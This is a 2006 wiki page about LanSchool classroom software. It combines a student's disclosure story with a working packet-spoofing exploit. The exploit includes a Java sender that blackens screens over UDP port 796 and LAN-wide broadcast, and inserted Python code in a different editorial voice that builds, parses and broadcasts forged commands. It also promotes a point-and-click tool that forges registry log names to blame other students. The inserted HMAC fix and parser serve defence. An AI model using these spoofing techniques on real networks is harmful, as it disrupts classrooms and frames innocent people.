LanSchool

From Compsci.ca Wiki


Revision as of 23:08, 22 November 2006

What is LanSchool

[Image: Taskbar.JPG, captioned "What it looks like"]

LanSchool is a trojan-horse type program that is used by many school boards in Ontario to spy on their students and to control one or all computers in a given lab. It is another example of school boards spending money on software that they could get for free, with the free version even being of higher quality. LanSchool has many flaws in its design, and thus many security holes, which are described below.

The LanSchool website: http://www.lanschool.com/

The Story

The Story as told by Hacker Dan:

During Grade 12, I changed schools, and the new school that I went to had substantially better computing facilities. I thought this was a good thing, but after playing around for a bit, I noticed a little green icon in the system tray that did not seem to do anything. Looking into this, I found out that it was a program named LanSchool (http://www.lanschool.com/). What is LanSchool, you ask? The name makes it sound innocent enough, maybe something to help students? Well, it may have started out that way, but what it has become is basically a Trojan horse program for teachers to use to watch everything that you are doing (including watching your screen) as well as giving them the ability to control your computer or all computers in the lab at the same time. As usual, the school board decided to spend money on something they could get for free and got a crappier version than what they could have got for free.

So I started looking into LanSchool more and found a demo version on their site. This demo version could not interact with the real versions that the school used and would not allow students to do any damage. First, I looked into how it used the registry of the computers that it was on, and found that every time the teacher application sent a command to the student versions it recorded which Windows user sent the command, the computer name of the computer that they were on, and the time, in the registries of every computer on the network. This meant that finding a full version of the software, although not hard, would end you up in a lot of trouble unless you brought your own computer to school, and even then it still could.

So I began to look at the packets it was sending and, to my shock, they were UDP and not TCP and they had no encryption or coding to them at all. This means that it is extremely easy to spoof the packets. So I quickly wrote up a simple Java program to test out my theory. After some time and experimentation, I decoded what most of the packets meant and was able to control the demo version of LanSchool. After looking more at the packets, I noticed that the difference between the demo version and the real version was that the demo version uses only one channel, which is never used by the real version. So it was simply a matter of changing the channel byte to a real channel in the packet to get it to work with most, if not all, versions of LanSchool. This also allowed me to make the registry logs say whatever I wanted, including blaming other students for the hack.

Now, being the nice guy that I am, I emailed my findings to LanSchool and suggested several ways to fix this exploit. Their response basically said that they would rather spend their time and effort enforcing the rules of the school and the law than fixing their program. They even made threats of legal action, as well as suspension, were I to use this program. So next, I went to my school and actually demonstrated (with their permission) the exploit and how insecure the product was. Again, nothing happened as a result of my efforts, so a month later I published how the system worked on compsci.ca.

It is now almost 2 years later, so I have rewritten my hack so that anyone, even script kiddies, can use it, complete with a nice GUI and everything. My hope is that by doing this I will teach people why writing software the way LanSchool has been written is bad from a security and integrity viewpoint, and encourage the school board to buy (if they must use such software) better software from companies that know what they are doing and are willing to keep up with the times. BTW, LanSchool's website still claims that there are no known bugs with LanSchool.


Communications with LanSchool

Feb. 26th, 2006

To: LanSchool
From: Hacker Dan

Hello, I am writing to inform you that you have a security flaw in your software, LanSchool v6.5. As with past versions of LanSchool, the packet is not secure and allows for manipulation by anyone on the network, whether they have the teacher version of the software installed or not. This becomes even more concerning when you see that this allows the exploiter to set the logs that are stored in the registry to whatever they want by manipulating that part of the packet. This would allow some students to exploit the network and then make it look like another student committed the attack from whatever computer they choose.

Also, the scope of this exploit goes beyond affecting one computer or one lab at a time. With a little thought the exploiter could affect all computers in a school running the software by rotating through the channels. Or, even worse, the attack could be used to affect all LanSchool installs on the net that are not protected by a firewall.

My recommendation would be to add some level of security to the packets, like a password that is encrypted (through MD5 possibly) and then checked on the client end against a password it was installed with. This would make the system as secure as the password and encryption, would only require the installer of the software to add in one more field, and you could still use UDP with minimal modification to your code.
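What the check recommended in the email looks like in practice, as an added Python example (it is not code from the page, from LanSchool, or from the email's author). Rather than a bare MD5 of the password, which the same sniffer could read and resend, it appends an HMAC over the whole datagram under a secret set at install time, and prefixes a send counter so a captured datagram cannot be replayed. The six-byte header, the log strings and the secret in the sample are constructed for the demonstration.

```python
import hashlib
import hmac
import struct

CTR_LEN = 4    # big-endian send counter, authenticated together with the packet
TAG_LEN = 32   # HMAC-SHA256 digest length


def authenticate(packet, secret, counter):
    """Teacher side: counter || packet || HMAC(secret, counter || packet).

    The packet itself stays in the clear: this stops forgery, tampering and
    replay, it does not stop anyone on the LAN from reading the commands.
    """
    body = struct.pack(">I", counter) + packet
    return body + hmac.new(secret, body, hashlib.sha256).digest()


class StudentVerifier:
    """Student side: holds the install-time secret and the last counter seen."""

    def __init__(self, secret):
        self.secret = secret
        self.last_counter = -1

    def accept(self, datagram):
        """Return the inner packet if it is authentic and fresh, else None."""
        if len(datagram) < CTR_LEN + TAG_LEN:
            return None                        # too short to carry a tag
        body, tag = datagram[:-TAG_LEN], datagram[-TAG_LEN:]
        expected = hmac.new(self.secret, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return None                        # forged, or altered in transit
        counter = struct.unpack(">I", body[:CTR_LEN])[0]
        if counter <= self.last_counter:
            return None                        # replay of a captured datagram
        self.last_counter = counter
        return body[CTR_LEN:]


def demo():
    """Walk through the cases the email raises; returns the outcome of each."""
    secret = b"lab-install-password"           # constructed shared secret
    # Constructed sample: six header bytes, then "computer name NUL user name NUL".
    header = b"\x07\x02\x05\xdf\xda\xd1"
    legit = header + b"TEACHER-PC\x00mrsmith\x00"
    student = StudentVerifier(secret)

    genuine = authenticate(legit, secret, counter=1)
    results = {"genuine": student.accept(genuine) == legit}

    # A student without the secret builds a packet blaming someone else and
    # pads it with zeros where the counter and tag would go.
    spoof = header + b"LAB-PC-07\x00victim\x00" + bytes(CTR_LEN + TAG_LEN)
    results["spoof"] = student.accept(spoof)

    # A sniffer captures the genuine datagram and rewrites only the log info
    # (same length, so the tag is the only thing that gives it away).
    tampered = genuine.replace(b"mrsmith", b"victim!")
    results["tampered"] = student.accept(tampered)

    # The genuine datagram is resent after it has already been accepted.
    results["replay"] = student.accept(genuine)
    return results


if __name__ == "__main__":
    print(demo())
```

The secret lives on every student machine (it is "the password it was installed with"), so anyone with administrative access to a lab box or to the installer can recover it and forge commands; this closes the network-spoofing hole described on this page, not local tampering. The counter also has to survive a teacher-side restart (persist it, or restart it from a timestamp), or the students will reject everything sent after the restart.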

The Packet

This is what the packet looks like:

Mode | Version | Channel | 00 or DF | DA | D1 | ___data here___ | ___log info___ |

Mode is basically the command you are sending. So far I have found a lot of them; here are some examples:

  • 00 - start broadcast of screens
  • 04 - restore computer screens
  • 07 - blacken all screens
  • 08 - unload LanSchool, or just freeze it up good

The version corresponds to the version of LanSchool you are running: versions 5.x seem to use 01, and 02 seems to be for 6.x.

The channel area is pretty simple: it is the channel number. The demo version uses channel FF in hex (255 in decimal).

The next 3 bytes are kind of hard to figure out but seem to always be the same in a given version of LanSchool. For 5.x and the early 6.x releases the first byte here should be 00; for 6.5 and some others it should be DF in hex. The other 2 seem to always be the same.

The data area holds the data for that command; some commands, like blacken all screens, do not need any.

The log area is where it puts the name of your computer and then your username for logging. This area also has a lot of useless 00 bytes that just take up space.
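The layout above as a builder and parser, added here as a Python example (not code from the page or from LanSchool). What it assumes beyond the text: the log area is the computer name and then the user name, each NUL-terminated and zero-padded to 64 bytes (the page gives no size); the parser is told the data length, because no length field is documented; and the constant DA D1 pair is used as a sniffer heuristic for spotting these datagrams on UDP port 796.

```python
import socket

# The four mode bytes listed on the page.
MODES = {
    0x00: "start broadcast of screens",
    0x04: "restore computer screens",
    0x07: "blacken all screens",
    0x08: "unload LanSchool (or freeze it)",
}
MAGIC = b"\xda\xd1"      # bytes 5 and 6, constant across versions per the page
DEMO_CHANNEL = 0xFF      # channel used by the demo version
LANSCHOOL_PORT = 796     # UDP port used by the page's Java example
LOG_SIZE = 64            # ASSUMED padded size of the log area (page gives none)


def build_packet(mode, version, channel, byte4=0x00, data=b"",
                 comp_name=None, user_name=None):
    """Assemble: mode | version | channel | 00-or-DF | DA | D1 | data | log.

    byte4 is 0x00 for 5.x/early 6.x and 0xDF for 6.5 per the text above.
    The log area (computer name, then user name, NUL-separated, zero padded)
    is appended only when a name is given, so a bare command is 6 bytes.
    """
    for name, value in (("mode", mode), ("version", version),
                        ("channel", channel), ("byte4", byte4)):
        if not 0 <= value <= 0xFF:
            raise ValueError(f"{name} must fit in one byte")
    packet = bytes([mode, version, channel, byte4]) + MAGIC + bytes(data)
    if comp_name is not None or user_name is not None:
        log = ((comp_name or "").encode("ascii") + b"\x00"
               + (user_name or "").encode("ascii") + b"\x00")
        if len(log) > LOG_SIZE:
            raise ValueError("log info too long")
        packet += log.ljust(LOG_SIZE, b"\x00")   # the "useless 00 bytes"
    return packet


def is_lanschool_datagram(raw):
    """Cheap heuristic for a sniffer: header present and DA D1 in place."""
    return len(raw) >= 6 and raw[4:6] == MAGIC


def parse_packet(raw, data_len=0):
    """Split a datagram into its fields. data_len is supplied by the caller
    (the page documents no length field); everything after the data is the
    log area, which is the part a spoofer rewrites to blame someone else."""
    if not is_lanschool_datagram(raw) or len(raw) < 6 + data_len:
        raise ValueError("not a LanSchool-style datagram")
    log = raw[6 + data_len:]
    comp_name = user_name = None
    if log:
        parts = log.split(b"\x00")
        comp_name = parts[0].decode("ascii", "replace")
        user_name = parts[1].decode("ascii", "replace") if len(parts) > 1 else ""
    return {
        "mode": raw[0],
        "mode_name": MODES.get(raw[0], "unknown"),
        "version": raw[1],
        "channel": raw[2],
        "byte4": raw[3],
        "data": raw[6:6 + data_len],
        "comp_name": comp_name,
        "user_name": user_name,
    }


def send_packet(packet, host="127.0.0.1", port=LANSCHOOL_PORT):
    """Send one datagram; 255.255.255.255 reaches the whole LAN but needs
    SO_BROADCAST set on the socket first."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        if host == "255.255.255.255":
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.sendto(packet, (host, port))


if __name__ == "__main__":
    # Same six bytes as the page's Java example: blacken screens, demo channel.
    demo = build_packet(0x07, 0x02, DEMO_CHANNEL, byte4=0x3F)
    print(demo.hex())                                # 0702ff3fdad1
    logged = build_packet(0x07, 0x02, 0x05, byte4=0xDF,
                          comp_name="LAB-PC-12", user_name="jsmith")
    print(parse_packet(logged))
```

Fed a pcap of port 796 traffic, the parser turns each datagram into the command, the channel, and the name pair that will land in every student registry; comparing that name pair with the actual source address of the datagram is the simplest way to catch the spoofing described on this page, since the real teacher console always sends from the same host.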

Application of the packet

The following is a very simple Java application that takes advantage of the above information to black out screens for the demo version of LanSchool 6.5, only on the computer you are using. To send to all computers in a network you could use the IP 255.255.255.255 (the socket then needs broadcast enabled).

import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;

public class LanHack {

  public static void main(String args[])
  {
     try
     {
        // Loopback: this demo only targets the machine it runs on.
        InetAddress ipaddr = InetAddress.getByName("127.0.0.1");
        DatagramSocket mysocket = new DatagramSocket();
        // mode 07 (blacken all screens), version 02 (6.x), demo channel FF,
        // then the three version-specific bytes (see the note below)
        byte sendbuf2[] = {(byte)0x07,(byte)0x02,(byte)0xff,(byte)0x3f,(byte)0xda,(byte)0xd1};
        // LanSchool listens on UDP port 796
        DatagramPacket sendPacket2 = new DatagramPacket(sendbuf2, sendbuf2.length, ipaddr, 796);
        mysocket.send(sendPacket2);
        mysocket.close();
     }catch(Exception e){
        e.printStackTrace();
     }
  }

}

Note that for lesser versions of LanSchool you would have to change the 0x3f to 0x00, and possibly the 0x02 to 0x01 or another number. Also, this is set to the demo channel 0xff; if you wanted to send to a real version you would have to set it to that channel number in hex.

LanSchooled

[Image: LanSchooled screen shot]

Now for what I did with all this knowledge: a point-and-click LanSchool hack that can help you understand how the packets work. Remember that this is only for educational use and should not be used for evil purposes, and I take no responsibility for what you do with it. With that said, I only tested it on the demo version, but I would like to hear from people if they got it to work on other versions.

How to use

The top frame shows the packet that will be sent; you can use the easy set-up buttons below it to set the packet to do what you want. The times bar lets you say how many times you want to send out the packet.

Setting the channel to "ALL" will send to all possible LanSchool channels, including the demo one. Setting the version to "9" will send version 2 but with 0x00 rather than 0xdf. Setting it to "2" will send version 2 with 0xdf. All other version numbers send their own version byte and 0x00.

The log info lets you set the user name and computer name that will be written into the registry logs of the computers affected. I would strongly recommend that people not exploit this to get people in trouble, since that is just evil.

You must hit send to actually send the packet. The easy set-up buttons just configure the packet you are going to send.

Where to get
